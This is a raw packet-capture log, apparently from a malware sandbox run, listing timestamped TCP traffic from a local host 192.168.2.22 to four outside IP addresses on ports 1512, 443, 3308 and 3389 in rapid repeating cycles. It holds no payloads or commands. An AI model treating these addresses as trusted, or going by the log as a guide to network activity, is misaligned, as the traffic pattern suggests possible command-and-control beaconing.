Jan 12, 2021 07:40:07.953784943 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:07.992969036 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:08.006899118 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:08.107650995 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:08.107728958 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:08.107924938 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:08.111023903 CET	49194	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:08.164313078 CET	1512	49194	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:08.223396063 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:08.275542974 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:08.275752068 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:08.276827097 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:08.328774929 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:08.344388962 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:08.344486952 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:08.358443975 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:08.412708998 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:08.412827969 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:08.419776917 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:08.419934034 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:08.471868992 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:08.472054958 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:08.510909081 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:08.524163961 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:08.642317057 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:08.642350912 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:08.642508030 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:08.680242062 CET	49195	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:08.732500076 CET	443	49195	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:08.789962053 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:08.833364010 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:08.833462000 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:08.835342884 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:08.878657103 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:08.889039040 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:08.889076948 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:08.889127016 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:08.889494896 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:08.902944088 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:08.947781086 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:08.947839975 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:08.957808018 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:08.957999945 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:09.001065969 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:09.001142979 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:09.041879892 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:09.044194937 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:09.044248104 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:09.158907890 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:09.158983946 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:09.159080982 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:09.162019014 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:09.330017090 CET	49196	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:09.373327971 CET	3308	49196	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:09.440907955 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:09.494643927 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:09.494723082 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:09.495460987 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:09.549495935 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:09.564984083 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:09.565011024 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:09.565089941 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:09.572567940 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:09.630386114 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:09.630491018 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:09.666655064 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:09.666752100 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:09.720662117 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:09.720873117 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:09.760148048 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:09.775330067 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:09.775382996 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:09.865371943 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:09.865427971 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:09.865617037 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:09.868534088 CET	49197	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:09.922180891 CET	3389	49197	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:10.091402054 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:10.144598961 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:10.144766092 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:11.144360065 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:11.197463036 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:11.204755068 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:11.204785109 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:11.204814911 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:11.204844952 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:11.211548090 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:11.265820026 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:11.265952110 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:11.270097971 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:11.270251036 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:11.323381901 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:11.323533058 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:11.361109018 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:11.376717091 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:11.480900049 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:11.480950117 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:11.481050014 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:11.482248068 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:11.486988068 CET	49198	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:11.540041924 CET	1512	49198	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:11.592641115 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:11.645127058 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:11.645220041 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:11.646473885 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:11.698892117 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:11.713543892 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:11.713639021 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:11.726490021 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:11.781140089 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:11.781290054 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:11.792150021 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:11.792509079 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:11.844758987 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:11.844851971 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:11.897138119 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:12.015892029 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:12.015924931 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:12.016233921 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:12.018452883 CET	49199	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:12.070636034 CET	443	49199	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:12.127607107 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:12.170730114 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:12.170819044 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:12.171432018 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:12.214562893 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:12.225539923 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:12.225575924 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:12.225720882 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:12.240118980 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:12.285233974 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:12.285372019 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:12.296437979 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:12.296838999 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:12.339899063 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:12.340020895 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:12.379379988 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:12.383080006 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:12.383105040 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:12.495811939 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:12.495835066 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:12.495892048 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:12.498164892 CET	49200	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:12.541163921 CET	3308	49200	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:12.610848904 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:12.664432049 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:12.664607048 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:12.665255070 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:12.718511105 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:12.731816053 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:12.731843948 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:12.731933117 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:12.731966972 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:12.737895012 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:12.796576977 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:12.796785116 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:12.801894903 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:12.802000046 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:12.856237888 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:12.856404066 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:12.895747900 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:12.909712076 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:12.909742117 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:13.000649929 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:13.000791073 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:13.000869989 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:13.000916958 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:13.006537914 CET	49201	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:13.060261011 CET	3389	49201	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:13.125484943 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:13.178446054 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:13.178585052 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:13.179465055 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:13.232393026 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:13.239167929 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:13.239196062 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:13.239249945 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:13.240638971 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:13.250823975 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:13.304897070 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:13.305012941 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:13.309936047 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:13.310153008 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:13.363023043 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:13.363142967 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:13.401063919 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:13.416049957 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:13.514229059 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:13.514261961 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:13.514465094 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:13.520080090 CET	49202	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:13.573457003 CET	1512	49202	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:13.651223898 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:13.703799009 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:13.703933001 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:13.705308914 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:13.757725000 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:13.772563934 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:13.772660017 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:13.786822081 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:13.841787100 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:13.842046976 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:13.852919102 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:13.853537083 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:13.905728102 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:13.905994892 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:13.958734035 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:14.077941895 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:14.077992916 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:14.078217983 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:14.083971977 CET	49203	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:14.136491060 CET	443	49203	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:14.198534966 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:14.241919994 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:14.242053986 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:14.242809057 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:14.286267996 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:14.296498060 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:14.296536922 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:14.296684980 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:14.307794094 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:14.352864027 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:14.352989912 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:14.357345104 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:14.357496977 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:14.400821924 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:14.401042938 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:14.441150904 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:14.444232941 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:14.444255114 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:14.557152987 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:14.557193041 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:14.557430983 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:14.562993050 CET	49204	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:14.606123924 CET	3308	49204	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:14.668152094 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:14.722217083 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:14.722480059 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:14.724062920 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:14.778376102 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:14.799191952 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:14.799243927 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:14.799510956 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:14.811922073 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:14.874006987 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:14.874109983 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:14.882380009 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:14.882659912 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:14.936568022 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:14.936793089 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:14.978224993 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:14.991134882 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:14.991167068 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:15.080677032 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:15.080701113 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:15.080924988 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:15.080996990 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:15.084225893 CET	49205	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:15.138031006 CET	3389	49205	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:15.201078892 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:15.254369020 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:15.254564047 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:15.255914927 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:15.309134960 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:15.316073895 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:15.316132069 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:15.316287041 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:15.329925060 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:15.384975910 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:15.385236025 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:15.392007113 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:15.392244101 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:15.445492029 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:15.445758104 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:15.485122919 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:15.499052048 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:15.499094963 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:15.600330114 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:15.600411892 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:15.600615025 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:15.606165886 CET	49206	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:15.659619093 CET	1512	49206	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:15.712512016 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:15.765005112 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:15.765219927 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:15.766124964 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:15.818157911 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:15.832707882 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:15.832906961 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:15.844523907 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:15.898899078 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:15.899094105 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:15.904802084 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:15.905059099 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:15.957117081 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:15.957283020 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:16.009521961 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:16.128807068 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:16.128830910 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:16.128925085 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:16.132160902 CET	49207	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:16.184207916 CET	443	49207	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:16.243985891 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:16.287205935 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:16.287448883 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:16.288568974 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:16.331557035 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:16.342420101 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:16.342442036 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:16.342561960 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:16.355408907 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:16.400454998 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:16.400649071 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:16.406836033 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:16.407094002 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:16.450840950 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:16.451049089 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:16.490122080 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:16.494256973 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:16.494296074 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:16.607372999 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:16.607402086 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:16.607475996 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:16.609853983 CET	49208	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:16.653446913 CET	3308	49208	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:16.726651907 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:16.781263113 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:16.781352997 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:16.782270908 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:16.835762024 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:16.857183933 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:16.857212067 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:16.857402086 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:16.863315105 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:16.924585104 CET	3389	49209	5.100.228.233	192.168.2.22
